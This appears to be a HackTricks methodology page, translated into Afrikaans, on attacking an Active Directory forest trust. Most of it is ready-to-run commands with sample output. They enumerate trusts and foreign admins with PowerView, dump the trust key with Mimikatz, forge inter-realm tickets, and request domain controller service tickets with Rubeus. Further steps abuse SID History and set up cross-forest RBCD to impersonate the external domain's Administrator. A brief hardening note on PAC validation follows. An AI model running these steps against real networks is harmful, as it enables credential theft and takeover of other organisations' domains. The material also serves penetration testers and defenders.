Eksterne Forest-domein - Eenrigting (Inkomend) of bidireksioneel

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

In hierdie scenario vertrou ’n eksterne domein jou (of albei vertrou mekaar), sodat jy ’n vorm van toegang tot dit kan kry.

Enumerasie

Eerstens moet jy die trust enumerate:

Get-DomainTrust
SourceName      : a.domain.local   --> Current domain
TargetName      : domain.external  --> Destination domain
TrustType       : WINDOWS-ACTIVE_DIRECTORY
TrustAttributes :
TrustDirection  : Inbound          --> Inboud trust
WhenCreated     : 2/19/2021 10:50:56 PM
WhenChanged     : 2/19/2021 10:50:56 PM

# Get name of DC of the other domain
Get-DomainComputer -Domain domain.external -Properties DNSHostName
dnshostname
-----------
dc.domain.external

# Groups that contain users outside of its domain and return its members
Get-DomainForeignGroupMember -Domain domain.external
GroupDomain             : domain.external
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=domain,DC=external
MemberDomain            : domain.external
MemberName              : S-1-5-21-3263068140-2042698922-2891547269-1133
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
DC=external

# Get name of the principal in the current domain member of the cross-domain group
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
DEV\External Admins

# Get members of the cros-domain group
Get-DomainGroupMember -Identity "External Admins" | select MemberName
MemberName
----------
crossuser

# Lets list groups members
## Check how the "External Admins" is part of the Administrators group in that DC
Get-NetLocalGroupMember -ComputerName dc.domain.external
ComputerName : dc.domain.external
GroupName    : Administrators
MemberName   : SUB\External Admins
SID          : S-1-5-21-3263068140-2042698922-2891547269-1133
IsGroup      : True
IsDomain     : True

# You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.

# Additional trust hygiene checks (AD RSAT / AD module)
Get-ADTrust -Identity domain.external -Properties SelectiveAuthentication,SIDFilteringQuarantined,SIDFilteringForestAware,TGTDelegation,ForestTransitive

SelectiveAuthentication/SIDFiltering* laat jou vinnig sien of cross-forest abuse paths (RBCD, SIDHistory) waarskynlik sal werk sonder ekstra voorvereistes.

In die vorige enumerasie is gevind dat die gebruiker crossuser binne die External Admins groep is wat Admin-toegang binne die DC van die eksterne domein het.

Aanvangstoegang

As jy nie enige spesiale toegang van jou gebruiker in die ander domein kon vind nie, kan jy steeds teruggaan na die AD Methodology en probeer om privesc from an unprivileged user (dinge soos kerberoasting byvoorbeeld):

Jy kan Powerview functions gebruik om die ander domein te enumerate met die -Domain param soos in:

Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName

Active Directory Methodology

Impersonation

Aanmelding

Deur ’n gewone metode te gebruik met die credentials van die gebruikers wat toegang tot die external domain het, behoort jy toegang te kry tot:

Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator

SID History Misbruik

Jy kan ook SID History misbruik oor ’n forest trust.

As ’n gebruiker van een forest na ’n ander gemigreer word en SID Filtering is not enabled, word dit moontlik om ’n SID van die ander forest by te voeg, en hierdie SID sal by die gebruiker se token gevoeg word wanneer daar oor die trust geverifieer word.

Warning

Ter herinnering, jy kan die signing key kry met

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local

Jy kan ’n TGT impersonating die gebruiker van die huidige domein onderteken met die trusted sleutel.

# Get a TGT for the cross-domain privileged user to the other domain
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

Volledige wyse om die user te impersonate

# Get a TGT of the user with cross-domain permissions
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap

# Get a TGT from the current domain for the target domain for the user
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap

# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap

# Now you have a TGS to access the CIFS service of the domain controller

Cross-forest RBCD wanneer jy ’n machine account in die trusting forest beheer (no SID filtering / selective auth)

As jou foreign principal (FSP) jou in ’n groep plaas wat computer objects in die trusting forest kan skryf (bv., Account Operators, custom provisioning group), kan jy Resource-Based Constrained Delegation op ’n target host in daardie forest instel en daar enige gebruiker impersonate:

# 1) From the trusted domain, create or compromise a machine account (MYLAB$) you control
# 2) In the trusting forest (domain.external), set msDS-AllowedToAct on the target host for that account
Set-ADComputer -Identity victim-host$ -PrincipalsAllowedToDelegateToAccount MYLAB$
# or with PowerView
Set-DomainObject victim-host$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sidbytes_of_MYLAB}

# 3) Use the inter-forest TGT to perform S4U to victim-host$ and get a CIFS ticket as DA of the trusting forest
Rubeus.exe s4u /ticket:interrealm_tgt.kirbi /impersonate:EXTERNAL\Administrator /target:victim-host.domain.external /protocol:rpc

Dit werk slegs wanneer SelectiveAuthentication is disabled en SID filtering nie jou controlling SID uitfiltreer nie. Dit is ’n vinnige lateral path wat SIDHistory forging vermy en word dikwels in trust reviews oor die hoof gesien.

PAC-validering verharding

PAC-handtekeningvalideringsopdaterings vir CVE-2024-26248/CVE-2024-29056 voeg ondertekeningsafdwinging by op inter-forest tickets. In Compatibility mode, forged inter-realm PAC/SIDHistory/S4U paths kan steeds werk op unpatched DCs. In Enforcement mode, unsigned of gemanipuleerde PAC-data wat ’n forest trust kruis, word geweier tensy jy ook die target forest trust key besit. Registry overrides (PacSignatureValidationLevel, CrossDomainFilteringLevel) kan dit verswak solank dit beskikbaar is.

Verwysings

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks